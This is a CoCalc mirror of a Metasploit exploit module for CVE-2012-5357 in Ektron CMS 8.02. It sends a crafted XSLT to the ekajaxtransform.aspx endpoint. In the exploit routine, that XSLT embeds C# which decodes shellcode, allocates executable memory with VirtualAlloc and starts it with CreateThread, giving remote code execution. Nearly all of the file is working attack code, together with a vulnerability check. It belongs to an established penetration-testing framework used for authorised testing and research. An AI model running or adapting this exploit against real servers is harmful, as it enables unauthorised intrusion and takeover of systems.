Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/ektron_xslt_exec.rb
19513 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Ektron 8.02 XSLT Transform Remote Code Execution',

17
        'Description' => %q{

18
          This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The

19
          vulnerability exists due to the insecure usage of XslCompiledTransform, using a

20
          XSLT controlled by the user. The module has been tested successfully on Ektron CMS

21
          8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK

22
          SERVICE privileges.

23
        },

24
        'Author' => [

25
          'Rich Lundeen', # Vulnerability discovery

26
          'juan vazquez', # Metasploit module

27
          'Nicolas "Nicob" Gregoire' # C# code using VirtualAlloc + copy shellcode + CreateThread

28
        ],

29
        'License' => MSF_LICENSE,

30
        'References' => [

31
          [ 'CVE', '2012-5357'],

32
          [ 'OSVDB', '88107' ],

33
          [ 'URL', 'http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/' ],

34
          [ 'URL', 'http://technet.microsoft.com/en-us/security/msvr/msvr12-016' ]

35
        ],

36
        'Payload' => {

37
          'Space' => 2048,

38
          'StackAdjustment' => -3500

39
        },

40
        'Platform' => 'win',

41
        'Privileged' => true,

42
        'Targets' => [

43
          ['Windows 2003 SP2 / Ektron CMS400 8.02', {}],

44
        ],

45
        'DefaultTarget' => 0,

46
        'DisclosureDate' => '2012-10-16',

47
        'Notes' => {

48
          'Reliability' => UNKNOWN_RELIABILITY,

49
          'Stability' => UNKNOWN_STABILITY,

50
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
        }

52
      )

53
    )

54


55
    register_options(

56
      [

57
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60]),

58
        OptString.new('TARGETURI', [true, 'The URI path of the Ektron CMS', '/cms400min/'])

59
      ]

60
    )

61
  end

62


63
  def check

64
    fingerprint = rand_text_alpha(5 + rand(5))

65
    xslt_data = <<~XSLT

66
      <?xml version='1.0'?>

67
      <xsl:stylesheet version="1.0"

68
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

69
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"

70
      xmlns:user="http://mycompany.com/mynamespace">

71
      <msxsl:script language="C#" implements-prefix="user">

72
      <![CDATA[

73
      public string xml()

74
      {

75
      return "#{fingerprint}";

76
      }

77
      ]]>

78
      </msxsl:script>

79
      <xsl:template match="/">

80
      <xsl:value-of select="user:xml()"/>

81
      </xsl:template>

82
      </xsl:stylesheet>

83
    XSLT

84


85
    res = send_request_cgi(

86
      {

87
        'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",

88
        'version' => '1.1',

89
        'method' => 'POST',

90
        'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",

91
        'headers' => {

92
          "Referer" => build_referer

93
        },

94
        'vars_post' => {

95
          "xml" => rand_text_alpha(5 + rand(5)),

96
          "xslt" => xslt_data

97
        }

98
      }

99
    )

100


101
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/

102
      return Exploit::CheckCode::Vulnerable

103
    end

104


105
    return Exploit::CheckCode::Safe

106
  end

107


108
  def uri_path

109
    uri_path = target_uri.path

110
    uri_path << "/" if uri_path[-1, 1] != "/"

111
    uri_path

112
  end

113


114
  def build_referer

115
    if datastore['SSL']

116
      schema = "https://"

117
    else

118
      schema = "http://"

119
    end

120


121
    referer = schema

122
    referer << rhost

123
    referer << ":#{rport}"

124
    referer << uri_path

125
    referer

126
  end

127


128
  def exploit

129
    print_status("Generating the EXE Payload and the XSLT...")

130
    fingerprint = rand_text_alpha(5 + rand(5))

131


132
    xslt_data = <<~XSLT

133
      <?xml version='1.0'?>

134
      <xsl:stylesheet version="1.0"

135
      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

136
      xmlns:msxsl="urn:schemas-microsoft-com:xslt"

137
      xmlns:user="http://mycompany.com/mynamespace">

138
      <msxsl:script language="C#" implements-prefix="user">

139
      <![CDATA[

140


141
      private static UInt32 MEM_COMMIT = 0x1000;

142
      private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

143


144
      [System.Runtime.InteropServices.DllImport("kernel32")]

145
      private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

146


147
      [System.Runtime.InteropServices.DllImport("kernel32")]

148
      private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

149


150
      public string xml()

151
      {

152
        string shellcode64 = @"#{Rex::Text.encode_base64(payload.encoded)}";

153
        byte[] shellcode = System.Convert.FromBase64String(shellcode64);

154
        UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

155
        System.Runtime.InteropServices.Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);

156
        IntPtr hThread = IntPtr.Zero;

157
        IntPtr pinfo = IntPtr.Zero;

158
        UInt32 threadId = 0;

159
        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);

160
        return "#{fingerprint}";

161
      }

162
      ]]>

163
      </msxsl:script>

164
      <xsl:template match="/">

165
      <xsl:value-of select="user:xml()"/>

166
      </xsl:template>

167
      </xsl:stylesheet>

168
    XSLT

169


170
    print_status("Trying to run the xslt transformation...")

171
    res = send_request_cgi(

172
      {

173
        'uri' => "#{uri_path}WorkArea/ContentDesigner/ekajaxtransform.aspx",

174
        'version' => '1.1',

175
        'method' => 'POST',

176
        'ctype' => "application/x-www-form-urlencoded; charset=UTF-8",

177
        'headers' => {

178
          "Referer" => build_referer

179
        },

180
        'vars_post' => {

181
          "xml" => rand_text_alpha(5 + rand(5)),

182
          "xslt" => xslt_data

183
        }

184
      }

185
    )

186
    if res and res.code == 200 and res.body =~ /#{fingerprint}/ and res.body !~ /Error/

187
      print_good("Exploitation was successful")

188
    else

189
      fail_with(Failure::Unknown, "There was an unexpected response to the xslt transformation request")

190
    end

191
  end

192
end

193


194